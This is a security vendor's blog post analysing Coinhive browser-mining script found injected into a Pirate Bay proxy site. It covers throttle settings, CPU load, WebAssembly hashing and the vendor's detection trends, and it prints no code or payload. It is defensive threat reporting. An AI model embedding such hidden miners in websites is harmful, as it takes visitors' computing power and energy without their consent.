• News
  • Security
  • Products
  • About Seqrite
Seqrite Blog Blog
  • News
  • Security
  • Products
  • About Seqrite
Home  /  Malware • Security  /  In-browser Cryptojacking at full throttle!
23 January 2018

In-browser Cryptojacking at full throttle!

Written by Prashant Kadam
Prashant Kadam
Malware, Security
  • 5
    Shares
Estimated reading time: 3 minutes

Cryptocurrencies like Bitcoin, Monero, Ethereum, Litecoin, and Tezos are in full swing. And they have exponentially increased cryptocurrency mining (or cryptomining) activities. Previously, cryptomining was carried out by powerful and dedicated mining hardware or by utilizing distributed computing because the entire process requires a lot of computation. However, there has been an observable change in the mining trends. Now, web browsers are taking part in cryptomining and its activity is growing because the computing power used in browser mining is much less than that require in hardware mining. Using web browsers to mine cryptocurrency is termed as In-browser Cryptojacking. 

Quick Heal Security Labs has come across some popular websites that are compromised with the Coinhive browser mining service.

What is Coinhive?

Coinhive is a browser mining service which offers a Javascript miner for the ‘Monero’ blockchain. It can be easily embedded in a website. When users access a Coinhive-injected website, the miner service is executed in the web browser and starts mining Monero XMR’s.

We suspect many businesses use this browser-mining service by integrating a piece of Javascript code into their website which consumes its visitors’ CPU time and energy to mine XMR(Monero) for Coinhive. Coinhive, in return, pays out some percentage of the mined value to website’s owner.

Our analysis

At Quick Heal Security Labs, we noticed that one of the proxy services of a famous torrent search engine called Pirate Bay was injected with the Coinhive miner service. Fig 1 below shows content injected into the Pirate Bay webpage.

Fig 1. Fiddler session screen-shot of Pirate Bay Website
Fig 1. Fiddler session screen-shot of Pirate Bay Website

As per the Coinhive official information, ‘OT1CIcpkIOCO7yVMxcJiqmSWoDWOri06’ is the user site key and the throttle is used to limit the CPU usage. Below are the throttle levels.

throttle: 0 – CPU usage limit to 100%

throttle: 0.3 – CPU usage limit to 80%

throttle: 0.5 – CPU usage limit to 50%-70%

After accessing Pirate Bay website, CoinHive.min.js got executed and started mining. The CPU usage reached its limit as per its defined throttle level. In some websites, it is defined as 0.5 so that particular instance of a browser will take 50%-70% of computation. Fig 2 shows the CPU usage activity of browser and overall system observed after accessing the Pirate Bay website.

Fig 2. CPU Usage after accessing Pirate Bay
Fig 2. CPU Usage after accessing Pirate Bay

Another important thing observed in ‘CoinHive.min.js’ file is the use of WebAssembly. It specifically runs on web browsers. It is similar to a low-level assembly-like language which runs with near native-performance which is a major factor to use web assembly in mining functionality implementation. 

Fig 3. WebAssembly module integration
Fig 3. WebAssembly module integration

WebAssembly uses the CryptonightWASMWrapper web assembly hash function to generate hashes. It is an efficiently computable function which maps data of arbitrary size to data of a fixed size and behaves similarly to a random function.

This mining activity is not malicious but it is running without the approval of the system owner and consumes CPU power which in turn slows down system performance. This bothers the user and hampers work significantly.

Seqrite detection

  • Seqrite has released generic detections to detect such in-browser Cryptojacking attacks.
  • These generic detections span over multiple security layers in our products.

Detection stats
Seqrite has successfully blocked the detected Coinhive miner activity. Below is the trend observed so far for the last few weeks.

Fig 4. Detection trend observed at Quick Heal Security Labs
Fig 4. Detection trend observed at Quick Heal Security Labs

In-browser mining is really an easy way to generate revenue for website owners and for mining service providers as well. And like Coinhive, other service providers like JSEcoin, MineMyTraffic, CryptoLoot, and CoinNebula are also taking part in it. In-browser mining is not a malicious activity but unauthorized mining and extensive CPU usage should not be permissible. Also, compromising one popular website could hamper many users.

Malware authors are using these mining services to fulfill their malicious needs. We advise our users to avoid browsing suspicious websites and keep their antivirus up-to-date to prevent your system from being used in such mining activities.

References

https://blogs.seqrite.com/massive-campaign-delivering-monero-miner-via-compromised-websites/ 
https://blogs.seqrite.com/beware-of-fake-cryptocurrency-mining-apps-a-report-by-quick-heal-security-labs/

Subject Matter Expert
Prashant Kadam | Quick Heal Security Labs

 Previous PostEndpoint Security: Things to consider before choosing the right o...
Next Post  What is the right time to audit your cybersecurity program?
Prashant Kadam
About Prashant Kadam

Prashant Kadam is part of the HIPS (Host-based Intrusion Prevention System) team in Quick Heal Security Labs. He has worked on various security vulnerabilities...

Articles by Prashant Kadam »

Related Posts

  • GandCrab Riding Emotet’s Bus!

    February 15, 2019
  • GandCrab Ransomware along with Monero Miner and Spammer

    January 24, 2019
  • Beware! Your website might be delivering Emotet malware

    December 29, 2018

No Comments

Leave a Reply.Your email address will not be published.

Cancel reply

CAPTCHA Image
Refresh Image

Popular Posts

  • Benefits of having Intrusion Prevention/Detection System in your enterprise Benefits of having Intrusion Prevention/Detection System in your enterprise February 15, 2018
  • 5 Security measures you should take to protect your organization’s network 5 Security measures you should take to protect your organization’s network August 11, 2017
  • GandCrab Riding Emotet’s Bus! GandCrab Riding Emotet’s Bus! February 15, 2019

Featured Authors

  • Seqrite
    Seqrite

    Follow us for the latest updates and insights related to security for...

    Read more..
  • Ankita Ashesh
    Ankita Ashesh

    Ankita is a Communications Strategist at Quick Heal with a passion for covering...

    Read more..
  • Sanjay Katkar
    Sanjay Katkar

    Sanjay Katkar is the Joint Managing Director and Chief Technology Officer of...

    Read more..

Latest Posts

  • Cybersecurity Predictions for 2019

    Cybersecurity Predictions for 2019

    February 22, 2019
  • How are social networking accounts used for malicious purposes?

    How are social networking accounts used for malicious purposes?

    February 18, 2019
  • GandCrab Riding Emotet’s Bus!

    GandCrab Riding Emotet’s Bus!

    February 15, 2019
Tweets by @Seqrite

Join our Newsletter

Sign up for our Newsletter and get regular cybersecurity round-ups delivered to your inbox.

Follow Us On

Topics

Antivirus For Linux (9) Antivirus For Server (9) Bitcoin (6) Cryptocurrency (7) Cyber-attack (29) cyber-attacks (54) Cybersecurity (165) cyber security (24) Cyber threat (28) cyber threats (44) data breach (48) data breaches (27) data loss (28) data loss prevention (33) data protection (20) data security (13) DLP (49) Encryption (11) endpoint security (94) Enterprise security (12) Exploit (12) firewall (8) GDPR (7) hackers (7) incident response plan (9) malware (24) malware attack (20) malware attacks (12) MDM (18) mobile device management (9) Network security (16) Patch Management (12) phishing (15) Ransomware (43) ransomware attack (29) ransomware attacks (29) ransomware protection (12) Seqrite (15) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Services (16) Unified Threat Management (7) UTM (30) Vulnerability (9) WannaCry (7)

Products

  • End Point Security (EPS)
  • Seqrite Encryption
  • Seqrite Endpoint Security Cloud
  • Mobile Device Management (MDM)
  • Cloud Security
  • Unified Threat Management
  • Antivirus for Server
  • Antivirus for Linux

Resources

  • White Papers
  • Datasheets
  • Threat Reports
  • Manuals
  • Case Studies

About Us

  • Company Overview
  • Leadership
  • Why choose SEQRITE?
  • Awards & Certifications
  • Newsroom

Archives

  • By Date
  • By Category

© 2018 Quick Heal Technologies Ltd. (Formerly Known as Quick Heal Technologies Pvt. Ltd.) Cookie Policies Privacy Policies

Our website uses cookies. Cookies enable us to provide the best experience possible and help us understand how visitors use our website.
By browsing this website, you agree to our cookie policy.